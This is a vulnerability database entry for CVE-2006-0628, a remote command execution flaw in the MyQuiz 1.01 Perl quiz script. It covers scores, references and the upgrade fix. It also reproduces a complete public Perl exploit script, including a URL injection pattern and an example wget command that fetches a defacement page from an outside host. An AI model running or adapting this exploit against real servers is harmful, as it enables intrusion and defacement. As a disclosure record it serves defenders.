CVE-2006-0628
CVSS 7.5
Published: 2006-02-10 06:02:00
Last revised: 2011-03-07 21:30:28

[Original] myquiz.pl in Dale Ray MyQuiz 1.01 allows remote attackers to execute arbitrary commands via shell metacharacters in the URL, which are not properly handled as part of the PATH_INFO environment variable.


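[CNNVD] Dale Ray MyQuiz myquiz.pl Arbitrary Code Execution Vulnerability (CNNVD-200602-134)

        myquiz.pl in Dale Ray MyQuiz 1.01 contains an arbitrary code execution vulnerability. Remote attackers can execute arbitrary commands via shell metacharacters in the URL, which are not properly handled as part of the PATH_INFO environment variable.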

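- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to result in information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]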

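- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links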

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0628
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0628
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-134
(Official data source) CNNVD

- Other links and resources

http://www.evuln.com/vulns/57/summary.html
(VENDOR_ADVISORY)  MISC  http://www.evuln.com/vulns/57/summary.html
http://www.corantodemo.net/coranto/viewnews.cgi?id=EpApAAAVkyirPGThSf&style=dldetails
(PATCH)  MISC  http://www.corantodemo.net/coranto/viewnews.cgi?id=EpApAAAVkyirPGThSf&style=dldetails
http://www.vupen.com/english/advisories/2006/0443
(UNKNOWN)  VUPEN  ADV-2006-0443
http://www.securityfocus.com/archive/1/archive/1/423921/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060203 [eVuln] MyQuiz Arbitrary Command Execution Vulnerability
http://xforce.iss.net/xforce/xfdb/24501
(UNKNOWN)  XF  myquiz-pathinfo-command-execution(24501)
http://www.securityfocus.com/archive/1/archive/1/424266/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060207 MyQuiz Arbitrary Command Execution Exploit (perl)
http://www.osvdb.org/22925
(UNKNOWN)  OSVDB  22925
http://securityreason.com/securityalert/409
(UNKNOWN)  SREASON  409
http://secunia.com/advisories/18737
(UNKNOWN)  SECUNIA  18737
http://attrition.org/pipermail/vim/2006-February/000537.html
(UNKNOWN)  VIM  20060209 Vendor ACK for MyQuiz

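- Vulnerability information

Dale Ray MyQuiz myquiz.pl Arbitrary Code Execution Vulnerability
High risk  Unknown
2006-02-10 00:00:00 2006-02-10 00:00:00
Remote
        myquiz.pl in Dale Ray MyQuiz 1.01 contains an arbitrary code execution vulnerability. Remote attackers can execute arbitrary commands via shell metacharacters in the URL, which are not properly handled as part of the PATH_INFO environment variable.

- Advisories and patches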

        

- Vulnerability information (1471)

MyQuiz 1.01 (PATH_INFO) Arbitrary Command Execution Exploit (EDBID:1471)
cgi webapps
2006-02-06 Verified
0 Hessam-x
N/A
#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x  / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded
# /   |   \_____    ____ |  | __ ___________________
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   /
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \
#       \/      \/     \/     \/    \/            \/
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net

use LWP::Simple;

print "-------------------------------------------\n";
print "= MyQuiz Remote Command Execution Exploit =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";


       print "Target(www.example.com)\> ";
       chomp($targ = <STDIN>);

       print "path: (/cgi-bin/myquiz.pl/ask/)\>";
       chomp($path=<STDIN>);

       print "command: (wget www.hackerz.ir/deface.htm)\>";
       chomp($comd=<STDIN>);


$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request,wait....\n";
get("http://".$targ.$path.";".$comd."|")
print "[+] Exploiting request done!\n";
print "Enjoy !";

# milw0rm.com [2006-02-06]
		

- Vulnerability information

22925
MyQuiz myquiz.pl $ENV{'PATH_INFO'} Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

MyQuiz contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered when an attacker calls the myquiz.pl script, but appends arbitrary commands via the pipe (|) symbol.

- Timeline

2006-02-03 Unknown
2006-02-03 Unknown

- Solution

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

 

 
